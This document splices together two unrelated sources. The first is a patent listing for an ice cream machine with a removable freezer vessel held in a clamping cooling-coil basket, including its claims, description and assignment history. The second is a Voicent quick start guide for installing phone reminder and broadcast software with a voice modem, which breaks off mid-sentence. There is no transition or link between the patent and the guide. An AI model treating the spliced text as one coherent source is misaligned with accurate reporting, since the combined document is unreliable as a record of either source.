Search Images Maps Play YouTube News Gmail Drive More » Sign in Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader. Patents 1. Advanced Patent Search Publication numberUS4538427 A Publication typeGrant Application numberUS 06/574,593 Publication dateSep 3, 1985 Filing dateJan 27, 1984 Priority dateFeb 4, 1983 Fee statusPaid Also published asCA1214652A, CA1214652A1, DE3403817A1 Publication number06574593, 574593, US 4538427 A, US 4538427A, US-A-4538427, US4538427 A, US4538427A InventorsAlfredo Cavalli Original AssigneeAlfredo Cavalli Export CitationBiBTeX, EndNote, RefMan External Links: USPTO, USPTO Assignment, Espacenet Apparatus for making ice cream and similar cold products and having a removable freezer vessel US 4538427 A Abstract An ice cream-making apparatus is described wherein the freezer vessel is engageable in and disengageable from a cooling basket comprising two half-shell-like parts openable to receive the freezer vessel and to be clamped thereon. The cooling coil forming the basket is resiliently yieldable radially of the actual basket. In an apparatus of this kind effective contact is always ensured between the cooling coil and the freezer vessel, so that efficiency is very high. Images(4) Previous page Next page Claims(2) I claim: 1. An apparatus for making ice cream and similar cold products, of the kind having a removable freezer vessel (24) and comprising a support structure (4) bounding a seat (12, 13) for supporting at least one cooling coil (14) forming a cylindrical basket (18) accessible from the top to receive the removable freezer vessel (24), characterised in that at least the side wall of the basket (18) is embodied by two substantially half-shell-like parts (16, 17) movable relatively to one another between an open position, in which the freezer vessel (24) is readily engageable and disengageable between them, and a closed position, in which the basket is substantially restored, the inner diameter of the basket (18) being less than the outer diameter of the freezer vessel (24), each of the parts of the at least one cooling coil (14) which forms the basket (18) being independently resiliently yieldable, means (8) being provided to maintain the substantially half-shell-like parts (16, 17) in the closed position, said substantially half-shell-like parts (16, 17) being movable angularly around a generatrix of the cooling basket (18) and being introduced into and in contact with respective blocks (10, 11) made of a support structure (4) and bounding the seat (12, 13) for receiving the cooling basket (18), said cooling basket (18) having its base (15) in contact with a resiliently yieldable block (9) disposed in the support structure (4), and further comprising means (25-27; 28, 29, 29a) for urging the freezing vessel (24) on to the cooling basket base (15); whereby effective good contact is maintainable between said removable freezer vessel and said cooling coil in said apparatus. 2. An apparatus according to claim 1, characterised in that the support structure (4) is box-like and is embodied by two box members (6, 7) hinged to one another by way of their vertical sides (6a, 7a) with a vertical hinging axis, at least one (7) of the box members (6, 7) being angularly movable around the latter axis, between a first position, in which the half-shell-like parts (16, 17) of the cooling basket (18) are in their open position, and a second position, in which the last-mentioned parts are in their closed position. Description DESCRIPTION This invention relates to an apparatus for making ice cream and similar cold products, of the kind having a removable freezer vessel and comprising a support structure bonding a seat for supporting at least one cooling coil forming a cylindrical basket accessible from the top to receive the removable freezer vessel. The term "freezer vessel" as used in the following description and claims is intended to denote a container, usually of stainless steel, in which the selected ingredients to make ice cream are mixed by a special rotating scraper blade device, the container being externally cooled by means of an appropriate cooling or refrigerating circuit. Of course a container of this kind, like the basket formed by the cooling coil in which the container is releaseably introducible, can be in shape cylindrical or conical or have the shape of any other body of revolution; however, for the sake of simplification and without limitation reference will be made in the following description and claims only to a cylindrical container and an associated cylindrical basket. With regard to the basket formed by the or each cooling coil, reference will be made to an inner cylindrical wall, the same being intended to denote the developed cylindrical surface of the cooling coil. In an ice cream-making-apparatus, the fact that the freezer vessel is removable means that the ice cream produced can be recovered readily and rapidly just by turning the freezer vessel upside down, that washing of the freezer vessel may be performed readily, rapidly and accurately and, with advantage, away from electrical and/or other operating parts of the ice cream-making apparatus, and that dead times between two consecutive operating cycles are very brief even in the case of an apparatus having just one freezer vessel. The conventional apparatuses can be broken down into two basic types, namely apparatuses in which the or each coil for the cooling liquid forms an upwardly flared conical basket adapted to receive a freezer vessel having the same conicity. Although the conicity may be carefully designed to ensure the necessary effective contact between the coil parts and the freezer vessel outer wall, contact does not in fact happen in the case of many of such parts for a variety of technical and technological reasons, such as minor errors in coil operation, deformability of the material--as a rule, copper--of which the coil is made, the result of distortions due to impacting or pushing, accidental pressures when the apparatus is in use, minor yieldings of the coil supports and so on. Of course, brine or ice forms wherever the contact between the coil and the vessel wall is unsatisfactory, with the result of a loss of cold (appreciable decrease in efficiency). In another kind of ice cream-making apparatus the or each cooling coil extends around an auxiliary brine tank in which the freezer vessel is immersed. The disadvantages of apparatuses of this kind have to do mainly with the appreciable constructional complications, sealing problems, the need for accurate control and handling of the auxiliary brine tank to obviate any possible loss of brine, with the resulting possibility of irreparable damage to the working parts of the apparatus, and the laborious manipulation required to operate the apparatus. The total of all these disadvantages has resulted in apparatuses of this kind being used industrially, and even there on a limited scale. The problem which the invention intends to solve is to obviate the disadvantages of the prior art by providing an ice cream-making apparatus having constructional and operating features such that, as well as the freezer vessel being removable, satisfactory contact is always ensured between all the cooling coil parts at the freezer vessel outer wall without any impediment to the removability of such vessel. This problem is solved in accordance with the invention by an apparatus to the kind hereinbefore considered wherein at least the side wall of the basket is embodied by two substantially half-shell-like parts movable relative to one another between an open position, in which the freezer vessel is readily engageable and disengageable between them, and a closed position, in which the basket is substantially restored, the inner diameter of the basket being less than the outer diameter of the freezer vessel, each of the parts of the at least one cooling coil which forms the basket being independently resiliently yieldable, and means being provided to maintain the substantially half-shell-like parts in the closed position. Advantageously and preferably, the substantially half-shell-like parts are removable angularly around a generatrix of the cooling basket. According to another feature of the invention, the substantially half-shell-like parts are introduced into and are in contact with respective blocks made of a resiliently yieldable material disposed in the support structure and bounding the seat thereof. The main advantages of the apparatus according to this invention are as follows: The freezer vessel can be introduced and removed readily and rapidly into and from the freezer basket when the same is open, thus providing all the advantages associated with a removable freezer vessel; Effective contact is always ensured between each coolin coil part (the cooling coil forming the basket) and the freezer vessel outer wall, the contact being the result of the resilient reaction of each coil part independently of the reaction of the other coil parts when the substantially half-shell-like parts forming the cooling basket are clamped together. Other features and advantages will become more clearly apparent from the following description of an embodiment of an apparatus for producing ice cream according to the invention, reference being made to the accompanying purely explanatory and non-limitative drawings wherein: FIG. 1 is a diagrammatic partly exploded and part-sectioned view of an apparatus according to the invention; FIG. 2 is a plan view of the apparatus of FIG. 1 in one operating condition; FIG. 3 is a view to an enlarged scale of a detail of the apparatus of FIG. 2; FIG. 4 is a plan view in section of the apparatus of FIG. 2 in another operating position; FIG. 5 is a view to an enlarged scale of the apparatus of FIG. 4, and FIG. 6 is a diagrammatic vertical section through an ice cream-making apparatus according to this invention. Referring to the drawings, a box-like member 1 carries an ice cream-making apparatus according to the invention. A portion 2 of the box 1 is adapted to receive, for instance, a conventional refrigerating unit (not shown) and possibly drive elements for rotating an ice cream-making blade, these elements being conventional and therefore not being shown. Laterally of the portion 2 the box 1 takes the form of a base 3 which is also box-like and which receives and supports operative parts of the apparatus according to the invention. Disposed on base 3 is a bearing or support structure 4 made either of a plastic having appropriate mechanical characteristics or, and preferably, of metal. Preferably but not limitatively, the structure 4 has a baseplate 5 secured to the base 3 and has two identical parallel-epipedic box members 6, 7 which are open towards one another and which lack the wall near the baseplate 5. More particularly, the member 6 is secured to or unitary with the baseplate 5. The member 7 has a vertical side 7a hinged to the opposite vertical side 6a of the member 6 by way of a vertical hinging axis. Those vertical sides 6b, 7b of the members 6, 7 respectively which are disposed opposite the hinged-together vertical sides are free. The member 7 can be moved angularly around the hinging axis between an open position, in which its free side 7b is remote from the corresponding free side of the member 6, and a closed position, in which the free sides 6b, 7b are in contact with one another. Clamping or locking means 8, for instance, of the toggle kind, are used to lock the members 6, 7 in their closed position. Of course, two or more devices 8 can be used if necessary. A parallelepipedic block 9 made of a resiliently yieldable material, for instance and preferably, rubber, of a predetermined thickness is secured to the baseplate 5 by conventional means (not shown). Similar blocks 10, 11 of the same resiliently yieldable material are secured in the members 6, 7 respectively. The blocks 10, 11 are formed centrally with identical hemi-cylindrical recesses 12, 13 respectively which extend vertically from the block 9 to the top of the members 6, 7. When the members 6, 7 are in the closed position, the oppositely disposed recesses 12, 13 co-operate to bound a cylindrical seat whose axis is vertical and which is closed at the bottom by the block 9 and which is open at the top, the cylindrical seat being fully accessible from above through an appropriate circular aperture 21 disposed partly in top wall 22 of member 6 and partly in top wall 23 of member 7. A cooling coil 14 extends as a spiral on the block 9, the coil 9 taking up a substantially circular surface and forming a circular base 15 of the same diameter as the diameter of the seat bounded by the recesses 12, 13. The coil 14 (or another coil) extends, in the form of a predetermined number of turns in contact with the cylindrical walls of the recesses 12, 13, to form two substantially half-shell-like parts 16, 17 which co-operate with the circular base 15 to bound a cylindrical cooling basket 18. The discrete coil parts 14 forming the half-shell-like parts 16, 17 are maintained in bearing engagement with the respective hemicylindrical walls of the recesses 12, 13 by conventional means which are not shown. Preferably, the complete cooling coil is partly boxed or embedded in the cylindrical walls of the recess 12, 13 and in the circular portion of the block 9. The discrete parts of the coil 14 are therefore resiliently yieldable independently of one another and different parts can be moved relatively to one another radially in connection with engagement with the cylindrical cooling basket 18. Also, in the vertical hinging zone of the members 6, 7 the coil 14 forms substantially U-shaped top and bottom loops 19, 20 respectively to enable the member 7 and the associated half-shell-like part 17 to move when required. A cylindrical freezer vessel 24 is used in the apparatus according to this invention; its outer diameter is greater than the inner diameter of the cylindrical cooling basket 18 as considered in the closed state--i.e., when the coil parts 16, 17 and the members 6, 7 are in the closed position. However, when the basket 18 is open, the basket inner wall co-operates with the freezer vessel outer wall to bound a consistent gap. The freezer vessel 24 has substantially right-angled projections 25 disposed diametrically opposite one another around its opening; one arm 26 of each member 25 extends parallel to the axis of the vessel 24 while the other arm 27 extends outwards of the vessel 24. Four right-angled members 28 are disposed diametrically opposite one another on the top walls 22, 23 of the members 6, 7; top part 29 of the members 28 extend radially towards the centre of the basket 18. FIGS. 3 and 5 show clearly how the parts 29 have an inclined underside 29a, the inclination extending upwardly and towards the basket 18. The surface or underside 29a is adapted to be engaged by the free side of the parts 27 of the members 26 on the vessel 24. The apparatus according to the invention as hereinbefore described operates as follows: In an initial state shown in FIGS. 1-3, the members 6, 7, 16, 17 are open, the opening being produced by member 7 being moved angularly around the vertical hinging axis. The freezer vessel 24 is then operatively introduced into the basket 18; when fully introduced the vessel 24 bears on the basket base 15 but its lateral surface is substantially out of contact with the basket inner wall. This introduction is made with the members 25 of the vessel 24 offset from the members 28. When introduction of the vessel 24 has been completed, it is turned around its longitudinal axis until the parts 27 of the members 25 engage below the parts 29 of the members 28 (FIG. 3). The member 7 is then moved around the vertical hinging axis so that the half-shell-like parts 16, 17 of the basket 18 take up the closed position, such position then being secured by means of the device 8. Since in the closed condition the basket inner wall is of smaller diameter than the freezer vessel outer wall as a result of the clamping, the cooling coil forming the basket extends effectively as a hoop around the freezer vessel. Also, because of the presence of the resiliently yieldable material on which the coil is mounted (preferably in partly boxed-in form), the resilient clamping reaction ensures effective contact between each part of the cooling coil and the freezer vessel outer wall. During the angular movement of the member 7 and, therefore, of the member 17 and during the subsequent clamping step, the engagement of the parts 27 of the members 25 of the freezer vessel 24 with the inclined surfaces of the elements 28 produces a uniform downwards thrust on the vessel 24, so that contact between the freezer vessel base and the spirally extending cooling coil forming the basket base 15 is ensured. The downwards thrust occurs simultaneously with the clamping and hooping action hereinbefore described. Upon completion of ice cream making, the or each device 8 is released, whereafter the members 7, 17 are moved angularly into the closed position so that the freezer vessel can be removed rapidly and possibly replaced by another freezer vessel which has been readied for a new cycle of production. Patent Citations Cited PatentFiling datePublication dateApplicantTitle US2622851 *Mar 17, 1949Dec 23, 1952Charles F WelshBarrel supporting and cooling device US2625804 *Jun 28, 1949Jan 20, 1953Novadelagene CorpBarrel cooling apparatus US2788643 *Jul 26, 1954Apr 16, 1957Marcus LipskyVertical frozen milk machine US3127530 *Feb 21, 1962Mar 31, 1964Fostoria CorpMotor driven pumps US3559423 *Aug 8, 1969Feb 2, 1971Scheidler WernerEquipment for working on liquid-filled conduits US3742723 *Nov 5, 1971Jun 25, 1985 Title not available US4019020 *Aug 13, 1975Apr 19, 1977The Gorman-Rupp CompanyControlled temperature fluid heater US4213498 *Nov 15, 1978Jul 22, 1980American HcpLow-cost flexible plastic heat exchanger Referenced by Citing PatentFiling datePublication dateApplicantTitle US5363746 *Dec 9, 1992Nov 15, 1994Gordon Ellis DAutomatic food preparation device US5493873 *Oct 20, 1993Feb 27, 1996Elkay Manufacturing CompanyLiquid dispensing device US5577393 *Jun 7, 1995Nov 26, 1996Elkay Manufacturing CompanyLiquid dispensing device with separable waterway US5601793 *May 25, 1995Feb 11, 1997Jgc CorporationSmall-capacity multi-purpose batch plant US5927098 *Dec 5, 1997Jul 27, 1999Daewoo Electronics Co., Ltd.Ice-cream machine US6029860 *Nov 25, 1996Feb 29, 2000Elkay Manufacturing CompanyLiquid dispensing device and hygienic adapter US6123232 *Jul 8, 1999Sep 26, 2000Elkay Manufacturing CompanyLiquid dispensing device and hygienic adapter therefor US6434966Mar 21, 2001Aug 20, 2002Kan-Pak, L.L.C.Self-contained liquid storage, delivery, and automatic fill apparatus and method US6438987 *Sep 7, 2001Aug 27, 2002Richard Charles PahlCompact countertop frozen food and beverage system for domestic use US6460580Aug 30, 2000Oct 8, 2002Kan-Pak, L.L.C.Self-contained liquid storage, delivery, and automatic fill apparatus and method US6571564Oct 23, 2001Jun 3, 2003Shashank UpadhyeTimed container warmer and cooler US6705106Sep 30, 2002Mar 16, 2004Kan-Pak, L.L.C.Semi-frozen beverage dispensing apparatus US6766650Jul 9, 2003Jul 27, 2004Kan-Pak, L.L.C.Semi-frozen beverage dispensing apparatus US6918258Jul 9, 2003Jul 19, 2005Kan-Pak, LlcSemi-frozen beverage dispensing apparatus US6990391Jun 12, 2003Jan 24, 2006Kan-Pak, L.L.C.Method and apparatus to control a beverage or dessert dispenser US7287386Apr 19, 2004Oct 30, 2007Snuddles, LlcContainer cooler and warmer US20040060306 *Jul 9, 2003Apr 1, 2004Kan-Pak, L.L.C.Semi-frozen beverage dispensing apparatus US20040060307 *Jul 9, 2003Apr 1, 2004Kan-Pak, L.L.C.Semi-frozen beverage dispensing apparatus US20040194470 *Apr 19, 2004Oct 7, 2004Upadhye Shashank S.Container cooler and warmer US20120096876 *Jun 11, 2010Apr 26, 2012Nestec S.A.Container having ingredients for preparing a frozen confection, container holder and device for preparing a frozen confection WO1995011194A1 *Oct 18, 1994Apr 27, 1995Elkay Manufacturing CompanyLiquid dispensing device WO2008091630A1 *Jan 22, 2008Jul 31, 2008Cabot Microelectronics CorporationMethods for ameliorating tissue trauma from surgical incisions Classifications U.S. Classification62/342, 165/42, 165/46 International ClassificationF25D, A23L3/36, F25D11/00, A23G9/12 Cooperative ClassificationF25D11/00, A23G9/12 European ClassificationF25D11/00, A23G9/12 Legal Events DateCodeEventDescription Mar 2, 1989FPAYFee payment Year of fee payment: 4 May 23, 1990ASAssignment Owner name: SI.MA.C S.P.A. - MACCHINE ALIMENTARI, VIA GARIBALD Free format text: ASSIGNMENT OF ASSIGNORS INTEREST.;ASSIGNORS:FILIPPI, CESARINA;CAVALLI, MASSIMO F.;CAVALLI, SILVIA, ALL HEIRS OF ALFREDO ANTONIO CAVALLI DEC D.;REEL/FRAME:005401/0265 Effective date: 19871201 Feb 24, 1993FPAYFee payment Year of fee payment: 8 Jul 25, 1996ASAssignment Owner name: MICROMAX-SIMAC S.R.L., ITALY Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:MICROMAX INTERNATIONAL S.R.L.;REEL/FRAME:008059/0453 Effective date: 19950918 Jul 26, 1996ASAssignment Owner name: MICROMAX INTERNATIONAL S.R.L., STATELESS Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:OLYMPIA S.P.A.;REEL/FRAME:008059/0513 Effective date: 19950119 Owner name: OLYMPIA S.P.A., ITALY Free format text: CHANGE OF NAME;ASSIGNOR:SI.MA.C S.P.A. - MACCHINE ALIMENTARI;REEL/FRAME:008059/0686 Effective date: 19880512 Jan 30, 1997FPAYFee payment Year of fee payment: 12 Nov 19, 1998ASAssignment Owner name: SIMAC-VETRELLA S.P.A., ITALY Free format text: CHANGE OF NAME;ASSIGNOR:VETRELLA S.P.A.;REEL/FRAME:009633/0486 Effective date: 19980629 Owner name: VETRELLA S.P.A., ITALY Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:MICROMAX - SIMAC S.R.L.;REEL/FRAME:009624/0677 Effective date: 19971127
Motorola VT1005 - Vonage VOIP Broadband Gateway Modem Installation guide QUICK START GUIDE & FREQUENTLY ASKED QUESTIONS RELEASE 2 TM VOICENT GATEWAY TM VOICENT AUTOREMINDER VOICENT BROADCASTBYPHONE TM This document guides you through installing and configuring the software applications for Voicent automated telephone notification system. Voicent AutoReminder is a powerful appointment scheduler with automatic phone reminders. Voicent BroadcastByPhone is aneasy-to-use telephone message delivering system. Both applications are based on Voicent Gateway, an advanced telephony platform for linking desktop computers with phone systems. This guide also provides troubleshooting information in the Frequently Asked Question section. For more information, please also read the program help menu within the program; visit the Voicent online support at http://www.voicent.com, or email to support@voicent.com. -1- VOICENT COMMUNICATIO NS INC TABLE OF CONTENT INSTALLATION I. System requirements II. Install Voicent software products III. Install your modem and connect it to a phone line CONFIGURATION I. Check hardware configuration II. License Setup USING AUTOREMINDER I. Make an appointment with automatic reminder call II. Make an appointment with automatic reminder call confirmation III. Use pre-recorded audio file for announcing your name RECORD YOUR MESSAGE I. Record message using telephone II. Record message using microphone USING BROADCASTBYPHONE I. Make broadcast calls II. Customize broadcast message III. Collect responses FREQUENTLY ASKED QUESTIONS I. II. III. IV. V. Generic question BroadcastByPhone AutoReminder EmailToPhone Developer SDK GETTING MORE HELP -2- and VOICENT COMMUNICATIO NS INC INSTALLATION This section covers installation instructions for Voicent software and hardware. The required hardware is a standard voice modem that can be obtained from Voicent or your local computer retailers. Your computer might have a voice modem installed already. So in that case, you only need to install the software programs – usually takes less than five minutes. The installation steps are summarized here and illustrated by the following flow diagram. 1. Install Voicent software 2. Voicent program informs you whether you have a voice modem or not. If not, go to step 4, otherwise continue with step 3. 3. Test your modem quality. If you experience poor voice quality, long delay at the beginning of the call, too early to play the message, or even system crash, please get a supported voice modem. Go to step 4 4. Purchase a supported voice modem and follow the modem installation instructions to install the modem driver and hardware. 5. Done Install Software Programs No Have Voice modem? Yes Test modem quality Poor quality Install a supported voice mode Done -3- Good quality Done VOICENT COMMUNICATIO NS INC I. System requirements Software requirements Windows 2000, XP or later. Hardware Intel Pentium III processor or later (Desktop computer preferred) 128 Meg or more memory a voice modem A voice modem is device capable of playing and recording audio over a telephone line. If you are not sure whether your computer has a voice modem or not, just go ahead with the installation. The software will inform you if it cannot find a voice modem. We only support Voicent 3025 Data/Fax/Voice PCI modem. You can get this modem from http://www.voicent.com/store for less than fifty dollars. A working phone line Voice modem requires an analog phone line. Analog phone lines are the ones for most residential homes or the ones used by fax machines behind corporate PBX boxes. A Voice over IP (VoIP) service like Vonage can also be used, provided a voice terminal is available for connecting a voice modem. Use a laptop computer Since the supported modem is an internal PCI voice modem, it cannot be installed on a laptop computer. Many external voice modems are known to work with Voicent products; however, these modems depend a lot on the quality of your laptop computer. In general, using Voicent on a laptop is less reliable and tends to have poor call quality. If possible, use a desktop computer. An old Dell desktop computer, such as those based on Pentium III, is a far better choice than most laptop computers. If you have to use a laptop computer, please choose a USB based voice modem, such as Zoom 2985 USB modem. If your computer does not have a USB port, you can try Zoom 3049 Serial port -4- VOICENT COMMUNICATIO NS INC modem, or Zoom 3075 PC card modem. You can get these modems from your local retailers. Use an external modem External modems are easier to install on a desktop or a laptop computer. However, these modems are not only more expensive but also less reliable than internal PCI modems. Test it fully before put the system into real use. Warning: Zoom 3049 external modem does not work with Intel Pentium 4 Hyper-Threading (HT) machine. A future driver might fix the problem. II. Install Voicent software Voicent software installation is straight forward. You can obtain a CD from Voicent or download it from http://www.voicent.com/download. 1). Voicent software package There are total 5 programs in Voicent software package: 1. Sun’s Java Virtual Machine, required by Voicent Gateway. If your system already has the software, this installation will skip this step. 2. Voicent Gateway, required installation 3. Voicent AutoReminder 4. Voicent BroadcastByPhone 5. Voicent BroadcastByEmail 2). Install the software Install from CD Insert Voicent Installer CD into your computer’s CD drive. The setup program should run automatically. If not, click on the setup.exe file. The installation steps are self guided. -5- VOICENT COMMUNICATIO NS INC Install from a Download package Voicent smart download manager allows you to download the entire software program to your computer. It allows you to download the whole program one piece at a time, stop and resume download at different times, and automatically assembles the whole program once all pieces are downloaded. Click on Install Voicent Programs after download is completed. Before you actually start to install the programs, you must check the requirement on the left side of the installation window. Meeting the minimum requirements can save you from running into problem later on. Once you have check through all the boxes on the left panel, simply follow the self-guided instructions to complete your installation. 3). Check Installation and Voicent After installation, Voicent AutoReminder icon BroadcastByPhone icon should appear on your Windows Desktop. Voicent Gateway icon should appear on Windows toolbar at right bottom corner of the screen. On Windows XP taskbar, the Gateway icon is usually hidden. Click on the < button to expose hidden icons, include the Gateway icon. To invoke Voicent Gateway, simply click on the Gateway icon. Voicent Gateway is a Windows service automatically during computer start up. program that is started 4). Check voice modem availability If your computer does not have a voice modem, you will see the Failed to detect a voice modem dialog window. Voicent software cannot continue without a voice modem. Click on the Purchase a Voice Modem button for instructions to get a supported voice modem. -6- VOICENT COMMUNICATIO NS INC Please note that supporting V.90 or V.92 data transmission standards does not imply your modem is voice capable. A good indication of voice capability is the inclusion of voice mail software in the modem package. We only support Voicent 3025 Data/Fax/Voice PCI modem. 4). Check voice modem quality The quality of your voice modem has a huge impact on the call quality. Many factors determine the modem voice capability, including the supported features of the hardware, the availability of onboard DSP, the quality of modem device driver, and the quality of the sound card of your computer. Warning: Some voice modems do not support standard voice device driver interface even they claim to be voice capable. If you have this type of modem, the program will malfunction when making phone calls. If that happens, please switch to Voicent modem for guaranteed performance. Checking the voice modem quality involves actually making some phone calls using either AutoReminder or BroadcastByPhone. See the next section for instruction using these programs. You are likely to experience the following problems if your voice modem is of poor quality. -7- VOICENT COMMUNICATIO NS INC 1) There is a long pause at the beginning of the audio messa ge. 2) No audio message is played when someone picks up the phone. 3) The audio message has already played when someone picks up the phone. 4) The system freezes when a call is in progress. The best solution is to get a Voicent voice modem. III. Install modem and connect it to a phone line Modem installation involves installing the modem hardware and its driver. Please follow the modem installation guide provided by your modem manufacture. After you have installed the modem hardware and its driver, you ca n check your modem installation by the following steps: 1). Click on the Windows Start button, then select Control Panel. 2). Click on the Phone and Modem Options, then select the Modem tab. 3). If you have installed the Voicent 3025 or Zoom 3025 modem, you should see Zoom V.92 PCI Voice Faxmodem listed 4). Click the Properties button, then select the Driver Tab. 5). The driver provider should be Zoom Telephonics, Inc -8- VOICENT COMMUNICATIO NS INC If in step 5 the driver provider is Microsoft, then your driver installation is not correct. The default Microsoft driver does not support voice. Please click Update Driver button to install the correct modem driver. If your modem is installed successfully, then simply connect your telephone wall jack to the modem jack marked LINE. You can also connect a regular phone to the other modem jack marked PHONE. As mentioned in system requirement, there are two ways to setup a phone line for Voicent software to work. One is to use normal telephone line; the other is to use Voice over IP connection. A). Regular telephone line When you use a regular phone line, please make sure to plug one end of the phone connector into the modem jack marked LINE. Plug the other end into a phone jack (the wall jack where you normally connect a phone). If you have a spare phone available, plug your phone into the modem PHONE jack if you want to use a phone on the same line with the modem. Your phone will work normally even if the computer is turned off. You can use the phone to test the phone line. B). Voice over IP When you use Voice over IP (VOIP), a voice terminal (adaptor) is required and is usually provided by your service provider. For example, Vonage uses Motorola VT1005 Voice Terminal. Your modem should be connected to the line jack of the voice terminal. -9- VOICENT COMMUNICATIO NS INC C O NF I G U R A T I O N I. License Setup The license setup window is automatically invoked during installation. If you don’t have a license during the installation, you can do it after installation. To invoke the license setup window, select Setupà License from the Voice nt Gateway main menu. 1) Setup shareware license [skip this step if you have full product license file] Fill in your name and phone number, and then click OK. Use the phone number you want people to call you back. (Voicent AutoReminder will automatically announce this phone number to the caller). 2) Import full product license file [skip this if you do not have the full product license file] If you have purchased the product, your product license file will be sent to you through email. However, you must apply for your license with your Voicent Gateway ID. To apply, please select Setup à Request Product License… from the Gateway main menu. Or you can visit Voicent’s website at http://www.voicent.com/store/license to apply for your license. After you submitted your license request, you should receive your license file through email within one business day. Your license file is sent as an - 10 - VOICENT COMMUNICATIO NS INC attached file of the email message. Save the attached file to a directory of your choice, such as C:\temp. Please note that some email programs directly include the license file in the message body instead as an attached file. In this case, please follow instructions in B). A). In the Setup License dialog, click Manage Licenses … button. Click the Browse button. In the Open File dialog, select license file you saved from email attachment. Click Install New License Button. The installed license should appear in the Installed Licensed window. Click Done button. B). If your email program include the license file directly into the email message, please select the copy paste lines radio button. Then copy the lines from “######### VOICENT LICENSE BEGIN ##########” to “########## VOICENT LICENSE END ##########” (include these lines); then paste it to the text window below the copy paste lines radio button. Click Install New License button, then click Done. Voicent Gateway should automatically restart. Now if you invoke AutoReminder and/or BroadcastByPhone, the correct license should be displayed in the title bar. - 11 - VOICENT COMMUNICATIO NS INC USING AUTOREMINDER I. Make an appointment with automatic phone reminder To invoke AutoReminder program, click on the AutoReminder icon on the Windows desktop. The left pane of the window is the main daily calendar area where appointments are displayed. The right pane is the monthly calendar. You can reschedule an appointment by moving the appointment to a different time slot. You can also dragn-drop an appointment to a different day. Tip: Select Help à Help Topics to learn more about AutoReminder. Or view the online manual from the support section of the Voicent’s website. Create a new appointment 1. Click on the New Appointment button to invoke the New Appointment dialog. Tip: You can also put your mouse cursor to the time you want to schedule an appointment, double click the left mouse button to invoke the dialog. The appointment start time will be set to the time slot you - 12 - VOICENT COMMUNICATIO NS INC selected. Warning: Since your modem occupies one phone line, you need another phone line to receive the reminder call. If you have a cell phone or another phone line, you can test it yourself. Otherwise, you will need a friend to help you to test it. 2. Enter the phone number you wish to dial. The phone number can be your second phone number, your cell phone number, or your friend’s phone number. Select a Start Time. 3. When the focus is leaving the contact field, a New Contact dialog will appear automatically. Fill in as much information as you can. Then click OK. 4. Select/set Time to Call, you have three choices. For this test, please choose Right Now. Tip: At the bottom of the dialog, the actual time the reminder call is shown. 5. Click Next. If you want to test the text-to-speech feature, you can enter some English text in the Notes section, then check the box of appointment notes (using text-to-speech). If you want to use your own voice message for additional reminder message, you can record a message in .wav file and select it by clicking on the browse button. Make sure your .wav file has the correct format of PCM 8 KHz, 16 bits, mono. Please see section “RECORD YOUR MESSAGE” for details of recording audio messages. 6. Click Finish. Your new appointment should appear in the appointment book. 7. Since you selected Call Now, the system will attempt to make a reminder call for the appointment you just made. For first time use, a dialog will pop up to inform you to say “hello” after answering the phone call. The system will play the reminder message after it a) detects a human voice, b) an answering machine beep, or c) time out after several seconds of silence. After you click OK, you should hear your modem dialing out. If you hear the modem dial or did not hear the phone ring, please refer to FAQ section on why it isn’t working for you. - 13 - VOICENT COMMUNICATIO NS INC 8. When you receive the phone call, pick up the phone and say hello. After that, you should hear the appointment reminder message. The message automatically includes the appointment date, time, and call back number. If an answering machine picks up the call, AutoReminder will wait till the beep and then leave a message. If you complete the above steps, you are ready to use AutoReminder to making calls for your business or personal use. If you have trouble complete any of the steps, please see the FAQ section of this guide or send email to support@voicent.com. II. Make an appointment with automatic phone reminder and confirmation If you have professional version of AutoReminder, appointment confirmation is automatically included in the reminder message. After the regular message is played, AutoReminder prompts the person to: 1). Press 1 to confirm the appointment 2). Press 2 to cancel the appointment 3). Press 3 to have some to call to reschedule the appointment 4). Press 4 to leave a voice message, or 5). Press 5 to replay the message. The steps to create an appointment with reminder call and confirmation is exactly the same as steps described in the previous section. By default, if you are using a professional version of AutoReminder, appointment reminder call includes confirmation automatically. If you do not want appointment confirmation, simply uncheck the Need confirmation or response check box in the New Appointment dialog. Check Response To check the response, you can check the display icons of the appointment. If the appointment is confirmed, you should see the confirmed icon . If the appointment is canceled, you should see the canceled icon . If there is a voice message, you should see the message icon . - 14 - VOICENT COMMUNICATIO NS INC For detailed call history of a particular appointment, you can double click on the appointment in the calendar to invoke the Edit appointment dialog. Click Call Detail Button to invoke the call history dialog. If there is a voice message, you can click on the Message in the Confirmation column. Once you click on it, you favorite wav player program should start playing the voice message. - 15 - VOICENT COMMUNICATIO NS INC Detailed Call Report for all calls for a particular day can be accessed from the View main menu. II. Use pre-recorded audio file for announcing your name If you do not like the text-to-speech pronunciation of your name or business, you can use a pre-recorded audio message for your name. Please see RECORD YOUR MESSAGE section later in the document for message recording instruction. In the Voicent Gateway main window, select Setup à My Name … menu item to invoke the Setup My Name dialog. Click the Browse button to select the Open File dialog. Select the name recording audio file, and then click OK. Next time the system makes a phone call or receives a phone call, the audio file will be used to pronounce your name or business. - 16 - VOICENT COMMUNICATIO NS INC RECORD YOUR MESSAGE There are several ways to record your voice messages. If you do not have a professional recording studio, the best way is to use telephone recording. I. Telephone recording Starting from release 2.0, you can use Voicent Gateway to record your . message using any telephone. To do so, click on Voicent Gateway icon From the Voicent Gateway window, select Operation à Recording… to invoke the recording dialog. Click the Save As button to select the recording file name. Then Click OK. Warning: In order to use telephone to record your message, your computer must have a voice modem installed and properly connected to a working telephone line. Once you click the Record Now button, Voicent Gateway is set for accepting in-bound phone calls for telephone recording. You will need two phones to do the recording. One phone line is the used by your voice modem, and the other for calling into the modem line. Call the phone number of the voice modem line. After Voicent Gateway picks up the call, simply follow the voice prompt to record your message. The recording message will be saved in the file you specified in the previous step. II. Record using Sound Recorder To invoke Sound Recorder, click on Window’s Start -> All Programs -> Accessories -> Entertainment -> Sound Recorder. You’ll need a computer microphone. When you finished recording, click file à save as, when Save As window pops up, enter a file name you want to use. DO NOT click on save yet. Click on Change button next to the Format for sound selection. You must select PCM 8 KHz, 16 bits, mono format. Click OK. - 17 - VOICENT COMMUNICATIO NS INC If you have a pre-recorded file that is of a different format, you can always use the Sound Recorder to convert it to the correct telephony format. Simply open the file in Sound Recorder, select Save As …, do the same as in the previous paragraph. III. Record using other sound recording device Record your message using other recording device to create a .wav file. Once the file is created, you may need to convert the format to 8.000 KHz, 16 Bit, Mono. You can use Microsoft sound recorder to do the 